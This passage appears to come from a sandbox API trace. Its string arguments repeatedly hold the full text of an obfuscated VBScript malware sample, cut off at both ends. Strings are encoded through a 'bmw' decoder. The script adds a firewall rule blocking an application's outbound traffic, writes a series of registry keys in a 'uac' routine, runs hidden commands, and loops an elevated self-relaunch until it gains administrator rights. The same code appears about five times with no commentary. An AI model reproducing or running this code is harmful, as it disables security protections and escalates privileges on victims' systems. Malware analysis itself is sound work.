TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.375] wcsncmp (_String1="\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.375] wcsncmp (_String1="\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.375] wcsncmp (_String1="newRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.375] wcsncmp (_String1="ewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.375] wcsncmp (_String1="wRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = 